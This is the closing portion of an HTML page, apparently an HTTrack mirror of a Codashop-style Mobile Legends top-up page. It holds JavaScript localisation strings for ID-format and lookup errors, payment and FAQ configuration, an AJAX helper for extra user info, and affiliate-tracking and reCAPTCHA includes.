            CODA.Shop.translation.userNameFormatErrorContent_withServer = 'User Name is invalid!<br/>The correct format should be  12345678(1234).';
            CODA.Shop.translation.memberNoOrAdmiralNoFormatErrorHeader = 'Invalid Member No. or Admiral No. format.';
            CODA.Shop.translation.memberNoOrAdmiralNoFormatErrorContent = 'The correct Member No. or Admiral No. format is 12345678 - 12345678';
            CODA.Shop.translation.memberNoOrCaptainNoFormatErrorHeader = 'Invalid Member No. or Captain No. format.';
            CODA.Shop.translation.memberNoOrCaptainNoFormatErrorContent = 'The correct Member No. or Captain No. format is 12345678 - 12345678';
            CODA.Shop.translation.lordNameOrStateIdFormatErrorHeader = 'Invalid Lord Name or State ID format.';
            CODA.Shop.translation.lordNameOrStateIdFormatErrorContent = 'The correct Lord Name or State ID format is User123 - 123';
            CODA.Shop.translation.accountIdFormatErrorContent_withServer = 'is invalid!<br/>The correct format should be  12345678(123-Server Name). ';
            CODA.Shop.translation.idNumberFormatErrorContent = 'The correct ID Number format is';
            CODA.Shop.translation.accountIdFormatErrorContent = 'is invalid!<br/>The correct format should be {0} ';
            CODA.Shop.translation.playerIdFormatErrorContent = 'Error!</br>The correct Player ID format is  12345678.';
            CODA.Shop.translation.playerIdFormatErrorContent_withServer = 'Error!</br>The correct Player ID format is  12345678(Server xxx).';
            CODA.Shop.translation.playerIdFormatErrorContent_withServer2 = 'Error!</br>The correct Player ID format is  1234567890@ABCDE (Server Name)';
            CODA.Shop.translation.accountCodeFormatErrorContent = '';
            CODA.Shop.translation.playerIdFormatErrorContent_withServerOS = 'Error!</br>The correct Player ID format is  OS + Server + 12345678';
            CODA.Shop.translation.sidFormatErrorContent = 'Wrong!</br>The correct SID format is';
            CODA.Shop.translation.nicknameFormatErrorContent = 'The correct format Nickname is User1234.';
            CODA.Shop.translation.rolenumberFormatErrorHeader = 'Incorrect Role Number Format!';
            CODA.Shop.translation.rolenumberFormatErrorContent= 'The correct Role Number format is';
            CODA.Shop.translation.uidFormatErrorHeader = '';
            CODA.Shop.translation.uidFormatErrorContent = '';
            CODA.Shop.translation.rememberMe = 'Remember me';
            CODA.Shop.translation.buyNow = 'Buy now';
            CODA.Shop.translation.buyNowGrab = '';
            CODA.Shop.translation.needYourEmail = 'Make sure your e-mail address is correct, we will use it to deliver your voucher code.';
            CODA.Shop.translation.emailOptional = 'OPTIONAL: If you would like a receipt of the purchase by email, please enter an email address';
            CODA.Shop.translation.readMore = 'Read more';
            CODA.Shop.translation.readLess = 'Read less';
            CODA.Shop.translation.outOfStockMsgHeader = 'Sorry!';
            CODA.Shop.translation.outOfStockMsgContent = 'This voucher has just run out of stock. Please check back in a while.';
            CODA.Shop.translation.memberValidFailHeader = 'Sorry!';
            CODA.Shop.translation.memberValidFailContent = 'You may only purchase the StarLight Member status once each month for one user account.';
            CODA.Shop.translation.seasonMemberValidFailContent = 'You may only purchase the Seasonal StarLight Member status once in 93 days(three months) for one user account.';
            CODA.Shop.translation.moontonTwilightPassOneTimeContent = '';
            CODA.Shop.translation.moontonSeasonalPassPremiumOneTimeContent = '';
            CODA.Shop.translation.limitedPurchaseContent = '';
            CODA.Shop.translation.mlVersionForbiddenContent = 'Sorry, your ID is under Mobile Legends VNG version, which is not allowed to topup through Codashop.';
            CODA.Shop.translation.loveNikkiOneTimeHeader = '';
            CODA.Shop.translation.loveNikkiOneTimeContent = '';
            CODA.Shop.translation.foodFantasyOneTimeHeader = '';
            CODA.Shop.translation.foodFantasyOneTimeContent = '';
            CODA.Shop.translation.foodFantasyExpireHeader = '';
            CODA.Shop.translation.foodFantasyExpireContent = '';
            CODA.Shop.translation.idNotFoundHeader = 'ID Not Found!';
            CODA.Shop.translation.idNotFoundContent = 'We cannot find your ID : ';
            CODA.Shop.translation.roleIdNotFoundHeader = 'Role ID Not Found!';
            CODA.Shop.translation.roleIdNotFoundContent = 'We cannot found your Role ID:';
            CODA.Shop.translation.idNumberNotFoundHeader = 'ID Number Not Found!';
            CODA.Shop.translation.idNumberNotFoundContent = 'We cannot find ID Number : ';
            CODA.Shop.translation.userIdNotFoundHeader = 'UserID not found!';
            CODA.Shop.translation.omletIdNotFoundHeader = 'Omlet ID not found!';
            CODA.Shop.translation.userNameNotFoundHeader = 'User Name not found!';
            CODA.Shop.translation.riotUserNameNotFoundHeader = '';
            CODA.Shop.translation.nicknameNotFoundHeader = 'Nickname not found';
            CODA.Shop.translation.userIdNotFoundContent = 'We could not find User ID of: ';
            CODA.Shop.translation.omletIdNotFoundContent = 'We cannot find your Omlet ID:';
            CODA.Shop.translation.userNameNotFoundContent = 'We could not find User Name of: ';
            CODA.Shop.translation.riotUserNameNotFoundContent = '';
            CODA.Shop.translation.nicknameNotFoundContent = 'We could not find Nick Name of:';
            CODA.Shop.translation.iggIdNotFoundHeader = 'IGG ID Not Found!';
            CODA.Shop.translation.iggIdNotFoundContent = 'We cannot find your IGG ID:';
            CODA.Shop.translation.characterIdNotFoundHeader = 'Character ID not found!';
            CODA.Shop.translation.characterIdNotFoundContent = 'We could not find Character ID of: ';
            CODA.Shop.translation.memberNoOrAdmiralNoNotFoundHeader = 'Member No. or Admiral No. Not Found!';
            CODA.Shop.translation.memberNoOrAdmiralNoNotFoundContent = 'We cannot find your Member No. or Admiral No.:';
            CODA.Shop.translation.memberNoOrCaptainNoNotFoundHeader = 'Member No. or Captain No. Not Found!';
            CODA.Shop.translation.memberNoOrCaptainNoNotFoundContent = 'We cannot find your Member No. or Captain No.:';
            CODA.Shop.translation.lordNameOrStateIdNotFoundHeader = 'Lord Name or State ID Not Found!';
            CODA.Shop.translation.lordNameOrStateIdNotFoundContent = 'We cannot find your Lord Name or State ID:';
            CODA.Shop.translation.accountIdNotFoundHeader = 'Account ID not found!';
            CODA.Shop.translation.accountIdNotFoundContent = 'We cannot found your Account ID:';
            CODA.Shop.translation.playerIdNotFoundHeader = 'Player ID Not found!';
            CODA.Shop.translation.playerIdNotFoundContent = 'This Player ID cannot be found: ';
            CODA.Shop.translation.accountCodeNotFoundHeader = '';
            CODA.Shop.translation.accountCodeNotFoundContent = '';
            CODA.Shop.translation.uidNotFoundHeader = '';
            CODA.Shop.translation.uidNotFoundContent = '';
            CODA.Shop.translation.sidNotFoundHeader = 'SID Not Found!';
            CODA.Shop.translation.sidNotFoundContent = 'We cannot find SID : ';
            CODA.Shop.translation.itemInvalidHeader = 'Sorry!';
            CODA.Shop.translation.itemInvalidContent = 'The item you select is no longer available.';
            CODA.Shop.translation.userNotEligibleHeader = 'Sorry!';
            CODA.Shop.translation.userNotEligibleContent = 'Your ID is not eligible to purchase this item.';
            CODA.Shop.translation.requirementNotMetHeader = 'Unable to purchase';
            CODA.Shop.translation.requirementNotMetContent = 'Requirements not met. Please read the instructions.';
            CODA.Shop.translation.loginRequiredHeader = 'Sorry!';
            CODA.Shop.translation.loginRequiredContent = 'User account needs to login first before doing topup.';
            CODA.Shop.translation.emptyRoleHeader = '';
            CODA.Shop.translation.emptyRoleContent = 'There is no role under this user account. Please create a role first.';
            CODA.Shop.translation.purchasedBeforeContent = 'You have already purchased the item before, please wait until it is expired.';
            CODA.Shop.translation.countryNotEligibalContent = 'Sorry, you can not top up this game account using this payment channel. Please visit Codashop for the country where your game account was created to top up this account.';
            CODA.Shop.translation.processErrorHeader = 'Sorry!';
            CODA.Shop.translation.CPF_NumberIncorrect = '';
            CODA.Shop.translation.processErrorContent = 'Unable to process your order. Please try in a few minutes.';
            CODA.Shop.translation.internalError = 'An internal error occurred. Please try again later!';
            CODA.Shop.translation.defaultPayError = '';
            CODA.Shop.translation.notAvailable = 'Not available';
            CODA.Shop.translation.fullNameRequired = '';
            CODA.Shop.translation.dobRequired = '';
            CODA.Shop.translation.CPFMinimumLength = '';
            CODA.Shop.translation.CPFNumberRequired = '';
			CODA.Shop.translation.mobileNumberLabelStart = '';
			CODA.Shop.translation.mobileNumberLabelEnd = '';
            CODA.Shop.translation.mobileNumberPlaceholder = '';
            CODA.Shop.translation.mobileNumberLabel = '';
			CODA.Shop.translation.mobileNumberSendSmsLabel = '';
            CODA.Shop.translation.mobileNumberSendSmsPlaceholder = '';
            CODA.Shop.translation.unableToCheckUserAcc = 'Sorry, Unable to check user account. Please try again later.';
            CODA.Shop.translation.serverTempNotAvailable = 'Sorry! Server temporarily not available';
            CODA.Shop.translation.purchaseProcessUnavailable = 'We can not process your purchase at the moment. Please try again later.';
            CODA.Shop.translation.emailAddress = 'E-mail address ';
            CODA.Shop.translation.fullName = '';
            CODA.Shop.translation.dobPlaceholder = '';
            CODA.Shop.translation.CPFNumber = '';
            CODA.Shop.translation.rememberMyDetails = 'Remember me';
            CODA.Shop.translation.nicknameNotFoundContent = 'We could not find Nick Name of:';
            CODA.Shop.translation.nicknameNotFoundHeadeir = 'Nickname not found';
            CODA.Shop.translation.rolenumberNotFoundHeader = 'Role Number Not Found!';
            CODA.Shop.translation.rolenumberNotFoundContent = 'We cannot found Role Number:';
            CODA.Shop.translation.userIdConfirmContentVN_VR1 = 'Please make sure your voucher denomination is ';
            CODA.Shop.translation.userIdConfirmContentVN_VR2 = '****Note that your recharge voucher must match the price you purchased. For example, you cannot use four vouchers of 50,000 ? to pay for a purchase of 200,000 ?. A voucher worth 200,000 is required.****';
            CODA.Shop.translation.selectOs = '';
            CODA.Shop.translation.oops = 'Oops!';
            CODA.Shop.translation.paymentChannelSuggestionRequired = 'Field cannot be empty';
            CODA.Shop.translation.paymentChannelSuggestionCaptchaRequired = 'Please tick this box';
            CODA.Shop.url.initPaymentAction = `https://order.codashop.com/sg/initPayment.action` ;
            CODA.Shop.url.AWSHost = 'https://cdn1.codashop.com/S';
            CODA.Shop.Country.BR = 'false';
            CODA.Shop.var.isAllowTxn = true;
            CODA.Shop.region='ap-southeast-1';
            CODA.Shop.url.addExInfo = "/sg/addExInfo.action";
            CODA.Shop.searchUrl = 'https://order.codashop.com/search';
            CODA.Shop.infoBar = '[]';
            CODA.Shop.faqData = '{\"faq\":[{\"question\":\"How to top up diamonds in Mobile Legends?\",\"answer\":\"<p class=\\\"shop-content--paragraph\\\">Buying diamonds in Mobile Legends is easy, safe and convenient at Codashop. Simply follow the steps below, and the diamonds will be added to your account in seconds.<\/p>\\n<ul class=\\\"shop-content--list list-number\\\"><li><a href=\\\"#top\\\">Click here to get started<\/a>.<\/li>\\n<li>Input your Mobile Legend\'s user ID.<\/li>\\n<li>Select the amount of diamonds you want to purchase.<\/li>\\n<li>Select the payment method that is most convenient for you.<\/li>\\n<li>Click on the \\\"Buy Now\\\" button to complete the transaction.<\/li><\/ul>\\n<p class=\\\"shop-content--paragraph\\\">Upon completing the payment, diamonds will be instantly credited to your MLBB account.<\/p>\"},{\"question\":\"Can I send gifts to friends in Mobile Legends?\",\"answer\":\"<p class=\\\"shop-content--paragraph\\\">Yes, you can send gifts in Mobile Legends using Codashop! Simply follow the steps below, and your gift will be sent to your friend\'s account in seconds.<\/p>\\n<ul class=\\\"shop-content--list list-number\\\"><li>Choose the gift you want to send to get started.\\n<ul class=\\\"shop-content--list list-dot\\\"><li><a href=\\\"#top\\\">Click here to gift diamonds<\/a>.<\/li><\/ul>\\n<li>Input the recepient\'s user ID.<\/li>\\n<li>Select the recharge amount or membership that you wish to send as a gift.<\/li>\\n<li>Select the payment method that is most convenient for you.<\/li>\\n<li>Click on the \\\"Buy Now\\\" button to complete the transaction.<\/li><\/ul>\\n<p class=\\\"shop-content--paragraph\\\">Upon completing the payment, the selected gift will be immediately sent to your recepient\'s MLBB account.<\/p>\"}]}' ? JSON.parse('{\"faq\":[{\"question\":\"How to top up diamonds in Mobile Legends?\",\"answer\":\"<p class=\\\"shop-content--paragraph\\\">Buying diamonds in Mobile Legends is easy, safe and convenient at Codashop. Simply follow the steps below, and the diamonds will be added to your account in seconds.<\/p>\\n<ul class=\\\"shop-content--list list-number\\\"><li><a href=\\\"#top\\\">Click here to get started<\/a>.<\/li>\\n<li>Input your Mobile Legend\'s user ID.<\/li>\\n<li>Select the amount of diamonds you want to purchase.<\/li>\\n<li>Select the payment method that is most convenient for you.<\/li>\\n<li>Click on the \\\"Buy Now\\\" button to complete the transaction.<\/li><\/ul>\\n<p class=\\\"shop-content--paragraph\\\">Upon completing the payment, diamonds will be instantly credited to your MLBB account.<\/p>\"},{\"question\":\"Can I send gifts to friends in Mobile Legends?\",\"answer\":\"<p class=\\\"shop-content--paragraph\\\">Yes, you can send gifts in Mobile Legends using Codashop! Simply follow the steps below, and your gift will be sent to your friend\'s account in seconds.<\/p>\\n<ul class=\\\"shop-content--list list-number\\\"><li>Choose the gift you want to send to get started.\\n<ul class=\\\"shop-content--list list-dot\\\"><li><a href=\\\"#top\\\">Click here to gift diamonds<\/a>.<\/li><\/ul>\\n<li>Input the recepient\'s user ID.<\/li>\\n<li>Select the recharge amount or membership that you wish to send as a gift.<\/li>\\n<li>Select the payment method that is most convenient for you.<\/li>\\n<li>Click on the \\\"Buy Now\\\" button to complete the transaction.<\/li><\/ul>\\n<p class=\\\"shop-content--paragraph\\\">Upon completing the payment, the selected gift will be immediately sent to your recepient\'s MLBB account.<\/p>\"}]}') : {};
            // Pass countryCode on page ready to JS
            getCurrentCountry2Name('SG');
        });
        function addExInfo(exUserInfo) {
            var isSuccess = false;
            if(exUserInfo == null || exUserInfo == 'undefined' || exUserInfo.trim() == ""){
                return isSuccess;
            }
            if(CODA.Shop.initPaymentData.beInitSess != null) {
                CODA.Shop.initPaymentData["exUserInfo"] = exUserInfo;
                isSuccess = true;
            } else {
                CODA.Shop.initPaymentData["exUserInfo"] = exUserInfo;
                CODA.Shop.initPaymentData["txnId"] = CODA.Shop.txnId;
                $.ajax({
                    type: "GET",
                    async: false,
                    url : CODA.Shop.url.addExInfo,
                    data: CODA.Shop.initPaymentData,
                    dataType: 'json',
                    timeout: 30000,
                    success: function (data) {
                        try {
                            var response = JSON.parse(data);
                            if (response.result && response.success) {
                                window.location.href = response.result;
                                isSuccess = true;
                            } else {
                                if (response && response.RESULT_CODE == 0) {
                                    var message = CODA.ResultCodes.codes[response.RESULT_CODE] ? CODA.ResultCodes.codes[response.RESULT_CODE].filter(function (val) {
                                        return val.lang == 'en';
                                    })[0] : ''
                                    if (!message) {
                                        message = CODA.ResultCodes.codes[response.RESULT_CODE] ? CODA.ResultCodes.codes[response.RESULT_CODE].filter(function (val) {
                                            return val.lang == 'default';
                                        })[0] : ''
                                    }
                                    if (message) {
                                        $('#errorMessage').html(message.text);
                                        $('#errorHeader').html("");
                                        $(".popError").show();
                                    }
                                    isSuccess = true;
                                    return;
                                } else if (response && response.errorMsg) {
                                    $('#errorMessage').html(response.errorMsg);
                                    $('#errorHeader').html("");
                                    $(".popError").show();
                                    return;
                                }
                                // throw new Error('Internal Error');
                            }
                        } catch (e) {
                            // $('#errorMessage').html('An internal error occurred. Please try again later!');
                            // $('#errorHeader').html("");
                            // $(".popError").show();
                        }
                    },
                    error : function(XMLHttpRequest, textStatus) {
                        $('#errorMessage').html('An internal error occurred. Please try again later!');
                        $('#errorHeader').html("");
                        $(".popError").show();
                    },
                    dataType: "text"
                });
            }
            return isSuccess;
        }
    </script>
<a href="https://plus.google.com/104822527805498875313" style="display: none;" rel="publisher">Google+</a>
<script type="text/javascript" src="https://cdn1.codashop.com/S2/content/common/js/infoBar.f1dbec77de.js"></script>
<script type="text/javascript" src="https://cdn1.codashop.com/S2/content/common/js/faq.6b9a447572.js"></script>
<script type="text/javascript" src="https://cdn1.codashop.com/S2/content/common/js/payment-channel-suggestion.cc3e11719f.js"></script>
<script type="text/javascript" src="https://www.google.com/recaptcha/api.js" async defer></script>
<script type="text/javascript">
        (function(t,a,p){t.TapfiliateObject=a;t[a]=t[a]||function(){ (t[a].q=t[a].q||[]).push(arguments)}})(window,'tap');
        tap('create', '11857-697628');
        tap('detect');
        tap('getTrackingId', null, function(trackingId) {
            CODA.Shop.affiliateTrackingId = trackingId ? trackingId : '';
        });
    </script>
</body>

<!-- Mirrored from codafreemlshp.wikaba.com/login.php by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 05 Nov 2020 09:19:02 GMT -->
</html>